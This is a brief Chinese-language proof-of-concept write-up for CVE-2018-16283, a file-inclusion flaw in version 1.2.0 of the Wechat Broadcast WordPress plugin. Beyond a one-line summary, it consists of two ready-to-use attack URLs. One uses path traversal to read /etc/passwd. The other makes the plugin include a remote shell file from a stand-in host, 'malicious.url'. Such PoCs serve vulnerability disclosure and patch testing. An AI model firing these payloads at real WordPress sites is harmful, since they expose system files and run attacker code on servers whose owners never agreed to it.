WordPress Plugin Wechat Broadcast LFI （CVE-2018-16283）

概述

/wechat-broadcast/wechat/Image.php参数url未经过滤，允许包含本地或远程文件

影响范围

Wechat Broadcast plugin 1.2.0

POC

本地文件包含

http://wordpress/wp-content/plugins/wechat-broadcast/wechat/Image.php?url=../../../../../../../../../../etc/passwd

远程文件包含

http://wordpress/wp-content/plugins/wechat-broadcast/wechat/Image.php?url=http://malicious.url/shell.txt